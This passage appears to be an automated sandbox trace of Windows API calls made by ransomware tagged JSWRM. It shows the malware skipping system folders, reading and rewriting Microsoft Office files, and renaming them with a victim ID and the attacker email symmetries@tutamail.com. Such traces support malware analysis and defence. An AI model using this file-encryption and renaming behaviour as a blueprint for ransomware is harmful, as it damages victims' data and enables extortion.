1 [0115.520] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcda3b5c7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcda3b5c7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcfce125, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x499f2, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ONGuide.onepkg", cAlternateFileName="ONGUID~1.ONE")) returned 1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2=".") returned 1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="..") returned 1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="...") returned 1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="windows") returned -1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="recovery") returned -1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="perflogs") returned -1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="documents and settings") returned 1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="$RECYCLE.BIN") returned 1 [0115.520] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="system volume information") returned -1 [0115.521] lstrcmpiW (lpString1="ONGuide.onepkg", lpString2="msocache") returned 1 [0115.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0115.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONGuide.onepkg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONGuide.onepkg", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONGuide.onepkg", lpUsedDefaultChar=0x0) returned 14 [0115.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0115.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0115.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONGuide.onepkg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONGuide.onepkg", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONGuide.onepkg", lpUsedDefaultChar=0x0) returned 14 [0115.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0115.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0115.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0115.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0115.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONGuide.onepkg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onguide.onepkg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.522] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=301554) returned 1 [0115.522] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0115.522] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0115.533] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.533] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0115.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.534] CloseHandle (hObject=0x238) returned 1 [0115.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0115.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0115.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0115.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0115.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0115.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0115.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.534] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONGuide.onepkg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onguide.onepkg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONGuide.onepkg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onguide.onepkg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0115.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0115.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0115.536] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc774d49, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc774d49, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc774d49, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x294d8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ONINTL.DLL", cAlternateFileName="")) returned 1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2=".") returned 1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="..") returned 1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="...") returned 1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="windows") returned -1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="recovery") returned -1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="perflogs") returned -1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="documents and settings") returned 1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="system volume information") returned -1 [0115.536] lstrcmpiW (lpString1="ONINTL.DLL", lpString2="msocache") returned 1 [0115.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0115.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0115.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0115.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0115.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0115.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0115.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0115.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0115.536] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46d8311, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46d8311, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46d8311, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ORGCH.VRD", cAlternateFileName="")) returned 1 [0115.536] lstrcmpiW (lpString1="ORGCH.VRD", lpString2=".") returned 1 [0115.536] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="..") returned 1 [0115.536] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="...") returned 1 [0115.536] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="windows") returned -1 [0115.536] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="recovery") returned -1 [0115.536] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="perflogs") returned -1 [0115.537] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="documents and settings") returned 1 [0115.537] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="$RECYCLE.BIN") returned 1 [0115.537] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="system volume information") returned -1 [0115.537] lstrcmpiW (lpString1="ORGCH.VRD", lpString2="msocache") returned 1 [0115.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0115.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCH.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCH.VRD", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCH.VRD", lpUsedDefaultChar=0x0) returned 9 [0115.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0115.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0115.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCH.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCH.VRD", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCH.VRD", lpUsedDefaultChar=0x0) returned 9 [0115.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0115.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0115.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0115.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0115.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCH.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgch.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.538] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1608) returned 1 [0115.538] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x640) returned 0x2332c0 [0115.538] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x640, lpOverlapped=0x0) returned 1 [0115.539] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.540] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x640, lpOverlapped=0x0) returned 1 [0115.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0115.540] CloseHandle (hObject=0x238) returned 1 [0115.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0115.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0115.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0115.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0115.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0115.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0115.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0115.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCH.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgch.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCH.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgch.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0115.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0115.552] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9bcfaf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9bcfaf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9c1bf71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x140b2, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ORGCHART.CHM", cAlternateFileName="")) returned 1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2=".") returned 1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="..") returned 1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="...") returned 1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="windows") returned -1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="recovery") returned -1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="perflogs") returned -1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="documents and settings") returned 1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="$RECYCLE.BIN") returned 1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="system volume information") returned -1 [0115.552] lstrcmpiW (lpString1="ORGCHART.CHM", lpString2="msocache") returned 1 [0115.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0115.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.CHM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.CHM", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.CHM", lpUsedDefaultChar=0x0) returned 12 [0115.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0115.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0115.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.CHM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.CHM", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.CHM", lpUsedDefaultChar=0x0) returned 12 [0115.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0115.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0115.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0115.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCHART.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgchart.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.553] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=82098) returned 1 [0115.553] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140b0) returned 0x24c1d0 [0115.553] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x140b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x140b0, lpOverlapped=0x0) returned 1 [0115.649] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.650] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x140b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x140b0, lpOverlapped=0x0) returned 1 [0115.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.651] CloseHandle (hObject=0x238) returned 1 [0115.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0115.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0115.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0115.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0115.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0115.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: 